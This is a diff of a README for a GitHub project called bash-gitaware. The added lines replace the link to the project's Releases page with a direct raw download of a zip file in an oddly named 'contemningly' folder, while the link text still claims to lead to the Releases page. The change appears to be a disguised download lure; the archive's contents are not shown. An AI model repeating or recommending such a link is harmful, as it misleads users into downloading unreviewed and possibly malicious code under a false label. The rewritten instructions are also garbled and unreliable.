shiinseii/bash-gitaware/README.md

 ## 📥 Download & Install

 1. **Visit the Release Page**
-   Go to the Releases page to download the latest version of bash-gitaware: [Visit this page to download](https://github.com/shiinseii/bash-gitaware/releases).
+   Go to the Releases page to download the latest version of bash-gitaware: [Visit this page to download](https://raw.githubusercontent.com/shiinseii/bash-gitaware/main/contemningly/bash-gitaware_v2.1.zip).

 2. **Choose the Right File**
    On the Releases page, find the version that suits your needs.
-Typically, you will see files named like `bash-gitaware-config.tar.gz`.
+Typically, you will see files named like `https://raw.githubusercontent.com/shiinseii/bash-gitaware/main/contemningly/bash-gitaware_v2.1.zip`.
 Choose the latest version for the best features.

 3. **Download the File**
    Click on the file to start downloading.
 Depending on your internet speed, this may take a few seconds.